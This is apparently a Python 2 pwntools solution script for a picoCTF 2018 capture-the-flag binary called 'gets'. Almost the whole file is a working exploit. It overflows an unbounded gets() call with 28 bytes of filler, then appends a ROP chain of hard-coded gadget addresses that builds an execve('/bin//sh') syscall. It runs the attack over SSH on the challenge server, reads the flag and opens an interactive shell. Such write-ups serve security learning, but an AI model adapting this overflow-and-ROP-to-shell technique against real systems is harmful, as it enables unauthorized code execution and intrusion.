#!/usr/bin/python
from pwn import *
USER = 'Platy' # SSH username on the challenge shell; change to your own account.
# Filler to reach the saved return address. 28 is the author's measured
# distance from the gets() buffer to the return address for this binary;
# it is not derivable from this script -- confirm against the binary.
padding = 'A' * 28
# execve("/bin//sh", NULL, NULL) chain generated by ROPgadget.
# All addresses are absolute and specific to this ./gets binary, which
# implies a fixed load base (no PIE) -- confirm with checksec. The comments
# below restore the gadget text that a find/replace of "p" mangled into
# "porop_gadgets".
#
# Step 1: write "/bin" at .data
rop_gadgets = p32(0x0806f02a) # pop edx ; ret
rop_gadgets += p32(0x080ea060) # @ .data
rop_gadgets += p32(0x080b81c6) # pop eax ; ret
rop_gadgets += '/bin'
rop_gadgets += p32(0x080549db) # mov dword ptr [edx], eax ; ret
# Step 2: write "//sh" at .data + 4 (double slash keeps the string 4-byte aligned)
rop_gadgets += p32(0x0806f02a) # pop edx ; ret
rop_gadgets += p32(0x080ea064) # @ .data + 4
rop_gadgets += p32(0x080b81c6) # pop eax ; ret
rop_gadgets += '//sh'
rop_gadgets += p32(0x080549db) # mov dword ptr [edx], eax ; ret
# Step 3: write a NULL dword at .data + 8 (string terminator, also used as argv/envp)
rop_gadgets += p32(0x0806f02a) # pop edx ; ret
rop_gadgets += p32(0x080ea068) # @ .data + 8
rop_gadgets += p32(0x08049303) # xor eax, eax ; ret
rop_gadgets += p32(0x080549db) # mov dword ptr [edx], eax ; ret
# Step 4: syscall arguments -- ebx = path, ecx = argv, edx = envp
rop_gadgets += p32(0x080481c9) # pop ebx ; ret
rop_gadgets += p32(0x080ea060) # @ .data
rop_gadgets += p32(0x080de955) # pop ecx ; ret
rop_gadgets += p32(0x080ea068) # @ .data + 8
rop_gadgets += p32(0x0806f02a) # pop edx ; ret
rop_gadgets += p32(0x080ea068) # @ .data + 8
# Step 5: eax = 11 (execve on 32-bit Linux), built as xor + eleven inc's
rop_gadgets += p32(0x08049303) # xor eax, eax ; ret
rop_gadgets += p32(0x0807a86f) # inc eax ; ret
rop_gadgets += p32(0x0807a86f) # inc eax ; ret
rop_gadgets += p32(0x0807a86f) # inc eax ; ret
rop_gadgets += p32(0x0807a86f) # inc eax ; ret
rop_gadgets += p32(0x0807a86f) # inc eax ; ret
rop_gadgets += p32(0x0807a86f) # inc eax ; ret
rop_gadgets += p32(0x0807a86f) # inc eax ; ret
rop_gadgets += p32(0x0807a86f) # inc eax ; ret
rop_gadgets += p32(0x0807a86f) # inc eax ; ret
rop_gadgets += p32(0x0807a86f) # inc eax ; ret
rop_gadgets += p32(0x0807a86f) # inc eax ; ret
rop_gadgets += p32(0x0806cc25) # int 0x80
# Full line fed to gets(): filler up to the return address, then the chain.
exploit = padding + rop_gadgets
# Key-based login: no password is passed, so the key installed during the
# ssh-keyz challenge must already be in place.
s = ssh(host='2018shell1.picoctf.com', user=USER) # Make sure ssh-keyz challenge is done first
# Start the target from its problem directory; py is the remote process handle.
py = s.run('cd /problems/can-you-gets-me_1_e66172cf5b6d25fffee62caf02c24c3d; ./gets')
# Python 2 only: print is a statement here, and the p32() + '/bin' concatenation
# above relies on str and bytes being the same type (TypeError under Python 3).
print py.recv()
# gets() reads this line without a length limit; this is where the overflow happens.
py.sendline(exploit)
# Consumed by the shell the chain spawns.
py.sendline('cat flag.txt')
print py.recv()
# Hand the session over to the user.
py.interactive()